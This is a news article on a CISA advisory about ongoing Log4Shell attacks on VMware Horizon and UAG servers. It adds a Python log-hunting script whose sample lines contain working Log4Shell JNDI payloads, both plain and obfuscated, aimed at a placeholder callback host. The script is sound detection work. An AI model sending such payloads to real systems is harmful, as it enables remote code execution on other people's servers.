CISA: Log4Shell Exploits Still Being Used to Hack VMware Servers

CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.

Attackers can exploit Log4Shell remotely on vulnerable servers reachable from the local network or the Internet, then move laterally across the network until they reach internal systems holding sensitive data.

After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.

Today, in a joint advisory with the US Coast Guard Cyber Command (CGCYBER), CISA said that servers have been compromised using Log4Shell exploits to gain initial access into targeted organizations' networks.

After breaching the networks, the attackers deployed various malware strains that provided the remote access needed to deploy additional payloads and exfiltrate hundreds of gigabytes of sensitive information.

"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2)," the advisory revealed.

"In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data."

Unpatched VMware systems should be considered compromised

Organizations that have not yet patched their VMware Horizon or UAG servers are advised to treat them as already compromised and start incident response (IR) procedures rather than simply applying the patch and moving on.

The steps required for a proper response in such a situation include the immediate isolation of potentially affected systems, collection and review of relevant logs and artifacts, engaging third-party IR experts (if needed), and reporting the incident to CISA.

"CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1," the two agencies said.

"If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA."

Today's advisory comes after VMware also urged customers in January to secure Internet-exposed VMware Horizon servers against ongoing Log4Shell attacks.

Since the start of the year, VMware Horizon servers have been targeted by Chinese-speaking threat actors to deploy Night Sky ransomware, by the Lazarus North Korean APT to deploy information stealers, and by the TunnelVision Iranian-aligned hacking group to deploy backdoors.
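The threat-hunting step above says to search for evidence of Log4Shell exploitation, and the first thing a practitioner wants is a scan of web, Horizon and UAG logs that is not fooled by the obfuscated lookup strings attackers used against these servers. The following is an added example written for this article; it is not code from CISA, CGCYBER or VMware, and it does not use the IOCs from the advisory. It assumes nothing about the Horizon or UAG log format (each line is treated as opaque text), and the log lines and IP addresses below are constructed for the example. It normalises the common Log4j lookup tricks (URL encoding, `${lower:x}`/`${upper:x}`, `${date:'x'}`, and the `${::-x}` default-value form) before matching the JNDI lookup, which the text's plain "${jndi:" search would miss.

```python
"""Hunt log lines for Log4Shell (CVE-2021-44228) JNDI lookup strings.

Added example for this article; not CISA/CGCYBER/VMware code.
Assumption: lines are opaque text (no specific Horizon/UAG log format).
The SAMPLE_LOG entries are constructed; IPs are from RFC 5737 ranges.
"""
import re
from typing import Iterable, List, Tuple
from urllib.parse import unquote

# Obfuscation forms attackers nest around the literal "jndi" token so that a
# naive substring match for "${jndi:" fails while Log4j still resolves them.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DATE_LITERAL = re.compile(r"\$\{date:'([^{}']*)'\}", re.IGNORECASE)
# ${<lookup>:-<default>} evaluates to <default> when the lookup is empty,
# so ${::-j} is just "j".
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")

# The lookup that actually triggers the remote class load. Schemes are those
# Log4j's JNDI lookup will dispatch to.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}?",
    re.IGNORECASE,
)


def normalize(text: str) -> str:
    """Collapse URL encoding and nested lookups until the text is stable."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)  # handles %24%7B... and double encoding
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DATE_LITERAL.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def hunt(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, de-obfuscated JNDI lookup) for each hit."""
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, 1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(0)))
    return hits


# Constructed sample lines: one benign request, a plain payload, two
# obfuscated payloads, a URL-encoded payload, and two benign lines that
# mention JNDI or "${" without being a lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 - "Mozilla/5.0"',
    '203.0.113.5 - - [23/Jun/2022:10:02:03 +0000] "GET /portal/ HTTP/1.1" 200 - "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [23/Jun/2022:10:03:04 +0000] "GET /portal/ HTTP/1.1" 200 - "${${lower:j}${upper:n}di:${lower:ldap}://198.51.100.7:1389/x}"',
    '203.0.113.5 - - [23/Jun/2022:10:03:30 +0000] "GET /portal/ HTTP/1.1" 200 - "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/b}"',
    '203.0.113.5 - - [23/Jun/2022:10:04:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 404 -',
    "2022-06-23T10:05:00Z INFO Using JNDI provider com.sun.jndi.ldap.LdapCtxFactory",
    "2022-06-23T10:06:00Z DEBUG Resolved property ${user.home} to /home/horizon",
]


if __name__ == "__main__":
    for number, payload in hunt(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

Running it against the constructed lines flags lines 2 through 5 and prints the de-obfuscated lookup for each, so an analyst can pivot on the callback host; the two benign lines mentioning JNDI and a `${...}` property are left alone. Feed real access, Horizon or UAG logs to `hunt()` one line at a time; any hit should be treated as a trigger for the isolation and log-collection steps above, not as proof of successful exploitation on its own, since blocked or failed attempts log the same string.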